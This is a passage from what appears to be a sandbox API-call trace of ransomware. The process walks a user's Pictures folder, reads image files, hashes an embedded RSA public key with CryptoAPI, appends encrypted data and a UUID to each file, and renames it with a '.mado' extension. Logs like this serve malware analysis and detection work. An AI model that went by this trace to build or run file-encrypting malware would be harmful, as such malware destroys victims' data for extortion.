lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.088] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0207.088] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3292eb8 | out: hHeap=0x2c0000) returned 1 [0207.088] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xd0) returned 0x3292eb8 [0207.088] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0207.088] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.088] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3292eb8 | out: hHeap=0x2c0000) returned 1 [0207.088] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xd0) returned 0x3292eb8 [0207.088] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0207.089] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.089] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3292eb8 | out: hHeap=0x2c0000) returned 1 [0207.089] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xd0) returned 0x3292eb8 [0207.089] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b7b950 [0207.089] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0207.089] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3292eb8 | out: hHeap=0x2c0000) returned 1 [0207.089] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xd0) returned 0x3292eb8 [0207.089] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8522zzaC3XYMo_\\941Y-ufnAszYHOsd\\hJg26t0YFz\\PFhCel7TQAYtpink7jNG\\") returned="PFhCel7TQAYtpink7jNG\\" [0207.089] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8522zzaC3XYMo_\\941Y-ufnAszYHOsd\\hJg26t0YFz\\") returned="hJg26t0YFz\\" [0207.089] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8522zzaC3XYMo_\\941Y-ufnAszYHOsd\\") returned="941Y-ufnAszYHOsd\\" [0207.089] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8522zzaC3XYMo_\\") returned="8522zzaC3XYMo_\\" [0207.089] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="Pictures\\" [0207.089] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0207.089] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0207.089] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0207.089] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0207.089] PathFindFileNameW (pszPath="") returned="" [0207.089] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8522zzaC3XYMo_\\941Y-ufnAszYHOsd\\hJg26t0YFz\\PFhCel7TQAYtpink7jNG\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2f20ce30, ftCreationTime.dwHighDateTime=0x1d5dae6, ftLastAccessTime.dwLowDateTime=0x156fd8a0, ftLastAccessTime.dwHighDateTime=0x1d5d85c, ftLastWriteTime.dwLowDateTime=0x156fd8a0, ftLastWriteTime.dwHighDateTime=0x1d5d85c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0207.091] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67078 | out: hHeap=0x2c0000) returned 1 [0207.091] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2f20ce30, ftCreationTime.dwHighDateTime=0x1d5dae6, ftLastAccessTime.dwLowDateTime=0x156fd8a0, ftLastAccessTime.dwHighDateTime=0x1d5d85c, ftLastWriteTime.dwLowDateTime=0x156fd8a0, ftLastWriteTime.dwHighDateTime=0x1d5d85c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0207.091] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf94168d0, ftCreationTime.dwHighDateTime=0x1d5dbd8, ftLastAccessTime.dwLowDateTime=0x1d6a4400, ftLastAccessTime.dwHighDateTime=0x1d5dcc1, ftLastWriteTime.dwLowDateTime=0x1d6a4400, ftLastWriteTime.dwHighDateTime=0x1d5dcc1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1g-W_c2", cAlternateFileName="")) returned 1 [0207.091] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3f26d0, ftCreationTime.dwHighDateTime=0x1d5de28, ftLastAccessTime.dwLowDateTime=0x436e2000, ftLastAccessTime.dwHighDateTime=0x1d5e1f7, ftLastWriteTime.dwLowDateTime=0x436e2000, ftLastWriteTime.dwHighDateTime=0x1d5e1f7, nFileSizeHigh=0x0, nFileSizeLow=0x78ab, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5qpuBbo6Z30.bmp", cAlternateFileName="5QPUBB~1.BMP")) returned 1 [0207.091] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8522zzaC3XYMo_\\941Y-ufnAszYHOsd\\hJg26t0YFz\\PFhCel7TQAYtpink7jNG\\5qpuBbo6Z30.bmp") returned=".bmp" [0207.091] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8522zzaC3XYMo_\\941Y-ufnAszYHOsd\\hJg26t0YFz\\PFhCel7TQAYtpink7jNG\\5qpuBbo6Z30.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\8522zzac3xymo_\\941y-ufnaszyhosd\\hjg26t0yfz\\pfhcel7tqaytpink7jng\\5qpubbo6z30.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0207.092] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=30891) returned 1 [0207.092] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0207.094] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x7885, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0207.094] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0207.096] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0x78ab, lpOverlapped=0x0) returned 1 [0207.096] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0207.096] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0207.096] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0207.096] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x321b78) returned 1 [0207.097] CryptCreateHash (in: hProv=0x321b78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0207.097] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0207.097] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0207.097] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0207.097] GetLastError () returned 0x0 [0207.098] CryptDestroyHash (hHash=0x32ef238) returned 1 [0207.098] CryptReleaseContext (hProv=0x321b78, dwFlags=0x0) returned 1 [0207.098] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0207.098] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0207.098] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0207.098] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0207.098] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0207.098] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b6eb80, Size=0x218) returned 0x3b7c6a8 [0207.098] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x78ab, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0207.099] WriteFile (in: hFile=0x63c, lpBuffer=0x3b817b0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b817b0*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0207.099] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b817b0 | out: hHeap=0x2c0000) returned 1 [0207.099] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0207.099] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0207.099] CloseHandle (hObject=0x63c) returned 1 [0207.100] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xf0) returned 0x32b69d8 [0207.100] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x900) returned 0x3b7b950 [0207.100] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b69d8 | out: hHeap=0x2c0000) returned 1 [0207.100] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8522zzaC3XYMo_\\941Y-ufnAszYHOsd\\hJg26t0YFz\\PFhCel7TQAYtpink7jNG\\5qpuBbo6Z30.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\8522zzac3xymo_\\941y-ufnaszyhosd\\hjg26t0yfz\\pfhcel7tqaytpink7jng\\5qpubbo6z30.bmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8522zzaC3XYMo_\\941Y-ufnAszYHOsd\\hJg26t0YFz\\PFhCel7TQAYtpink7jNG\\5qpuBbo6Z30.bmp.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\8522zzac3xymo_\\941y-ufnaszyhosd\\hjg26t0yfz\\pfhcel7tqaytpink7jng\\5qpubbo6z30.bmp.mado")) returned 1 [0207.101] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0207.101] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0207.101] VirtualFree (lpAddress=0x3d10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0207.102] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0207.102] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5689ffc0, ftCreationTime.dwHighDateTime=0x1d5e08e, ftLastAccessTime.dwLowDateTime=0xd40d85c0, ftLastAccessTime.dwHighDateTime=0x1d5d9bd, ftLastWriteTime.dwLowDateTime=0xd40d85c0, ftLastWriteTime.dwHighDateTime=0x1d5d9bd, nFileSizeHigh=0x0, nFileSizeLow=0x11618, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="80NZ7_xxR.gif", cAlternateFileName="80NZ7_~1.GIF")) returned 1 [0207.102] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xd0) returned 0x3292eb8 [0207.102] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x136) returned 0x336fe98 [0207.102] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3292eb8 | out: hHeap=0x2c0000) returned 1 [0207.102] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8522zzaC3XYMo_\\941Y-ufnAszYHOsd\\hJg26t0YFz\\PFhCel7TQAYtpink7jNG\\80NZ7_xxR.gif") returned=".gif" [0207.103] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8522zzaC3XYMo_\\941Y-ufnAszYHOsd\\hJg26t0YFz\\PFhCel7TQAYtpink7jNG\\80NZ7_xxR.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\8522zzac3xymo_\\941y-ufnaszyhosd\\hjg26t0yfz\\pfhcel7tqaytpink7jng\\80nz7_xxr.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0207.103] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=71192) returned 1 [0207.104] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0207.106] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x115f2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0207.106] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0207.107] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0207.107] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0207.107] SetFilePointer (in: hFile=0x63c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0207.107] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0x11618, lpOverlapped=0x0) returned 1 [0207.108] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0207.108] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1da) returned 0x3310808 [0207.108] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0207.108] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0207.108] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x321b78) returned 1 [0207.109] CryptCreateHash (in: hProv=0x321b78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0207.109] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0207.109] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0207.109] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x32b3720 [0207.109] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0207.109] GetLastError () returned 0x0 [0207.109] CryptDestroyHash (hHash=0x32ef238) returned 1 [0207.109] CryptReleaseContext (hProv=0x321b78, dwFlags=0x0) returned 1 [0207.109] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0207.109] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0207.110] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0207.110] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0207.110] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0207.110] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0207.110] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0207.110] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11620) returned 0x3b87c98 [0207.110] SetFilePointer (in: hFile=0x63c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0207.110] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0207.110] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x3310808 [0207.110] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0207.110] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x32eb20 [0207.110] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e51f8 [0207.110] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b873b8 [0207.110] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79d28 [0207.110] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b87400 [0207.110] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79d40 [0207.110] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79d70 [0207.110] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79db8 [0207.110] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79d88 [0207.111] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x32f7e58 [0207.111] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x3b6eb80 [0207.111] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b6eb80, Size=0x218) returned 0x3b7c6a8 [0207.111] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3b7b950 [0207.111] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79d70 | out: hHeap=0x2c0000) returned 1 [0207.111] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79d88 | out: hHeap=0x2c0000) returned 1 [0207.111] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79db8 | out: hHeap=0x2c0000) returned 1 [0207.111] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f7e58 | out: hHeap=0x2c0000) returned 1 [0207.111] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0207.111] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79db8 [0207.111] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277198 [0207.111] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x3b79d88 [0207.111] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b36c0 [0207.111] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x3b79d70 [0207.111] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277188 [0207.111] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x3b75968 [0207.111] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0207.111] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e5258 [0207.111] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b3720 [0207.111] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x3b75a80 [0207.111] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36e0 [0207.111] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 [0207.111] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b75968 | out: hHeap=0x2c0000) returned 1 [0207.111] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79d88 | out: hHeap=0x2c0000) returned 1 [0207.111] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0207.111] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79d70 | out: hHeap=0x2c0000) returned 1 [0207.111] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36c0 | out: hHeap=0x2c0000) returned 1 [0207.112] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0207.112] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79db8 | out: hHeap=0x2c0000) returned 1 [0207.112] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0207.112] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e51f8 | out: hHeap=0x2c0000) returned 1 [0207.112] HeapFree (in: hHeap=0x2c0000, 